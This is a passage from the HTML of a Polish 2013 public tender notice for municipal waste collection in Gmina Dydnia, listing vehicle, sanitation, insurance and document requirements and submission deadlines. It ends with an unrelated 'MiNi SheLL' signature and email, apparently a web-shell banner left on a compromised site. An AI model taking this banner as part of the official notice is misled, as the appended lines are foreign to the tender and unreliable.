		c) Część transportowa oraz część magazynowa bazy mogą znajdować się na oddzielnych terenach, przy jednoczesnym spełnieniu warunków określonych w ust. 1-2.

3.	W zakresie posiadania wyposażenia umożliwiającego odbieranie odpadów komunalnych od właścicieli nieruchomości oraz jego odpowiedniego stanu technicznego należy zapewnić, aby:

1)	w posiadaniu podmiotu odbierającego odpady komunalne od właścicieli nieruchomości 	znajdowały się co najmniej:

		- dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych 
		- oraz co najmniej dwa pojazdy przystosowane do odbierania selektywnie zebranych 			odpadów komunalnych,
		-  a także co najmniej jeden pojazd do odbierania odpadów bez funkcji kompaktującej;

2)	pojazdy były trwale i czytelnie oznakowane, w widocznym miejscu, nazwą firmy oraz 	danymi adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne od właścicieli nieruchomości;

4.	W zakresie utrzymania odpowiedniego stanu sanitarnego pojazdów i urządzeń należy zapewnić, aby:
1) 	pojazdy i urządzenia były zabezpieczone przed niekontrolowanym wydostawaniem się na zewnątrz odpadów, podczas ich magazynowania, przeładunku, a także transportu;
2) 	pojazdy i urządzenia były poddawane myciu i dezynfekcji z częstotliwością gwarantującą 	zapewnienie im właściwego stanu sanitarnego, nie rzadziej niż raz na miesiąc, a w okresie	letnim nie rzadziej niż raz na  2 tygodnie;
3) 	podmiot odbierający odpady komunalne od właścicieli nieruchomości posiadał aktualne dokumenty potwierdzające wykonanie czynności, o których mowa w pkt 3;
4) 	na koniec każdego dnia roboczego pojazdy były opróżnione z odpadów i były parkowane 	wyłącznie na terenie bazy magazynowo-transportowej.

5.	1. W zakresie wymagań technicznych dotyczących wyposażenia pojazdów należy zapewnić, aby:

1) 	konstrukcja pojazdów zabezpieczała przed rozwiewaniem i rozpylaniem przewożonych 	odpadów oraz minimalizowała oddziaływanie czynników atmosferycznych na odpady;
2)	 pojazdy były wyposażone w system:
		a) monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postojów oraz
		b) czujników zapisujących dane o miejscach wyładunku odpadów - umożliwiający weryfikację tych danych;
		3) pojazdy były wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedłoży wykaz przeciętnego zatrudnienia w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	Za spełnienie warunku Zamawiający uzna posiadanie opłaconej polisy ubezpieczeniowej, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem 		zamówienia na kwotę - minimum 200 000,00 PLN.

2.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach 	zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie	od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji	zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.

3.	Jeżeli wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 pzp, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b pzp,	Zamawiający w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda:

	1) w przypadku warunków, o których mowa w art. 22 ust. 1 pkt 4 pzp - dokumentów, o których mowa w ust. 1 pkt 9-11, a także innych dokumentów, dotyczących sytuacji ekonomicznej i finansowej, określonych w ogłoszeniu o zamówieniu lub w specyfikacji istotnych warunków zamówienia;

	2) dokumentów dotyczących w szczególności:
	
	a)  zakresu dostępnych wykonawcy zasobów innego podmiotu,
	b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
	c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
	d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. 
18.2. 	Wykonawcy, którzy nie wykażą spełniania warunków udziału w postępowaniu, podlegać będą wykluczeniu z udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>- udokumentowanie wykonanych, usług (wykonali na rzecz właścicieli nieruchomości usługę odbioru odpadów komunalnych w ciągu 6 miesięcy co najmniej o masie minimum: - 300 Mg), w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane,	oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmiany przepisów prawa - w szczególności związanych z przedmiotem zamówienia, 	Zamawiający w porozumieniu z Wykonawca określą zakres czynności zmierzających do wypełnienia postanowień umowy i sposobu ich realizacji.
1.2.	Okoliczności powodujące zwiększenie lub zmniejszenie liczby obsługiwanych 	nieruchomości w zakresie odbioru odpadów komunalnych.
1.3.	Wystąpienie okoliczności powodujących konieczność zmiany osób które będą uczestniczyć w wykonaniu przedmiotu zamówienia (przewidzianych w ofercie), na osoby o co najmniej równoważnych kwalifikacjach i doświadczeniu. 
1.4.	Wszelkie zmiany i uzupełnienia treści umowy wymagają formy pisemnej w postaci aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.zetorzeszow.eu/ugdydnia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dydnia - pok. nr  106 - w godz. 715 - 1500 -  po uprzednim zamówieniu za zaliczeniem pocztowym (na koszt Wykonawcy)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2013 godzina 11:00, miejsce: Urząd Gminy Dydnia - pok. Nr 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com